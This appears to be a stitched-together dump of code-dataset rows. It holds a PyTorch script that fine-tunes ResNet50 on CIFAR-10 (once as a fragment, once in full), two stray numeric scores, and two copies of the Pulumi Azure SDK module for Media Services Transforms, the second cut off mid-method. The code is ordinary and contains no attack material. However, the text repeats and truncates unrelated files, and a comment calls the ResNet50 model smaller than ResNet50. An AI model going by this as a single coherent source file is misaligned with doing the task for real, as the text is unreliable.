optimizer.first_step(zero_grad=True) # second forward-backward step smooth_crossentropy(model(x), y).mean().backward() optimizer.second_step(zero_grad=True) tot_loss += loss.item() tot_num += x.shape[0] return tot_loss / tot_num def test(dataloader): model.eval() correct = 0 num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) pred = logits.argmax(1) correct += torch.sum(pred==y).item() num += x.shape[0] acc = correct / num return acc if __name__ == '__main__': accs = [] losses = [] model_path = 'pth/resnet50.pth' for epoch in range(EPOCH): #训练sam大叔优化器,也可以考虑使用KFAC优化器 loss = train(trainloader) testacc = test(testloader) accs.append(testacc) losses.append(loss) if epoch % 1 == 0: print('epoch',epoch,'loss',loss,'acc',testacc) #可以考虑使用scheduler #scheduler(epoch) torch.save(model.state_dict(),model_path)
cmp_resnet.py
from os import X_OK import torch import torchvision from net.cvt_offical import get_cvt13_pretrained from utils import train_transform, test_transform,initialize,smooth_crossentropy from config import device from ptflops import get_model_complexity_info import torch.nn.functional as F import torch.nn as nn initialize(42) device = torch.device('cuda:0') model = torchvision.models.resnet50(pretrained=True) flops, params = get_model_complexity_info(model,(3,224,224),print_per_layer_stat=False) print('flops',flops, 'params',params) model.fc = nn.Linear(512*4,10) model.to(device) # flops 4.06 GMac params 19.6 M 均比resnet50小 BATCH = 32 trainset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=True, download=True, transform=train_transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH, shuffle=True) testset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=False, download=True, transform=test_transform) testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH, shuffle=False) LR = 1e-3 DECAY = 0 EPOCH = 20 optimizer = torch.optim.SGD(model.parameters(),lr=LR,momentum=0.9,weight_decay=DECAY) def train(dataloader,train_sam=False): model.train() tot_loss = 0 tot_num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) #非SAM if train_sam is False: optimizer.zero_grad() loss = smooth_crossentropy(logits,y).mean() loss.backward() optimizer.step() #可以考虑使用SAM进行训练 else: loss = smooth_crossentropy(logits,y).mean() loss.backward() optimizer.first_step(zero_grad=True) # second forward-backward step smooth_crossentropy(model(x), y).mean().backward() optimizer.second_step(zero_grad=True) tot_loss += loss.item() tot_num += x.shape[0] return tot_loss / tot_num def test(dataloader): model.eval() correct = 0 num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) pred = logits.argmax(1) correct += torch.sum(pred==y).item() num += x.shape[0] acc = correct / num return acc if __name__ == '__main__': accs = [] losses = [] model_path = 'pth/resnet50.pth' for epoch in range(EPOCH): #训练sam大叔优化器,也可以考虑使用KFAC优化器 loss = train(trainloader) testacc = test(testloader) accs.append(testacc) losses.append(loss) if epoch % 1 == 0: print('epoch',epoch,'loss',loss,'acc',testacc) #可以考虑使用scheduler #scheduler(epoch) torch.save(model.state_dict(),model_path)
0.554712
0.386821
import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['TransformArgs', 'Transform'] @pulumi.input_type class TransformArgs: def __init__(__self__, *, media_services_account_name: pulumi.Input[str], resource_group_name: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None): """ The set of arguments for constructing a Transform resource. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. """ pulumi.set(__self__, "media_services_account_name", media_services_account_name) pulumi.set(__self__, "resource_group_name", resource_group_name) if description is not None: pulumi.set(__self__, "description", description) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Input[str]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: pulumi.Input[str]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @pulumi.input_type class _TransformState: def __init__(__self__, *, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering Transform resources. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ if description is not None: pulumi.set(__self__, "description", description) if media_services_account_name is not None: pulumi.set(__self__, "media_services_account_name", media_services_account_name) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) if resource_group_name is not None: pulumi.set(__self__, "resource_group_name", resource_group_name) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> Optional[pulumi.Input[str]]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_group_name", value) class Transform(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ ... @overload def __init__(__self__, resource_name: str, args: TransformArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param TransformArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = TransformArgs.__new__(TransformArgs) __props__.__dict__["description"] = description if media_services_account_name is None and not opts.urn: raise TypeError("Missing required property 'media_services_account_name'") __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name super(Transform, __self__).__init__( 'azure:media/transform:Transform', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform': """ Get an existing Transform resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _TransformState.__new__(_TransformState) __props__.__dict__["description"] = description __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs __props__.__dict__["resource_group_name"] = resource_group_name return Transform(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Output[str]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @property @pulumi.getter def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name")
sdk/python/pulumi_azure/media/transform.py
import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['TransformArgs', 'Transform'] @pulumi.input_type class TransformArgs: def __init__(__self__, *, media_services_account_name: pulumi.Input[str], resource_group_name: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None): """ The set of arguments for constructing a Transform resource. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. """ pulumi.set(__self__, "media_services_account_name", media_services_account_name) pulumi.set(__self__, "resource_group_name", resource_group_name) if description is not None: pulumi.set(__self__, "description", description) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Input[str]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: pulumi.Input[str]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @pulumi.input_type class _TransformState: def __init__(__self__, *, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering Transform resources. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ if description is not None: pulumi.set(__self__, "description", description) if media_services_account_name is not None: pulumi.set(__self__, "media_services_account_name", media_services_account_name) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) if resource_group_name is not None: pulumi.set(__self__, "resource_group_name", resource_group_name) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> Optional[pulumi.Input[str]]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_group_name", value) class Transform(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ ... @overload def __init__(__self__, resource_name: str, args: TransformArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param TransformArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = TransformArgs.__new__(TransformArgs) __props__.__dict__["description"] = description if media_services_account_name is None and not opts.urn: raise TypeError("Missing required property 'media_services_account_name'") __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") 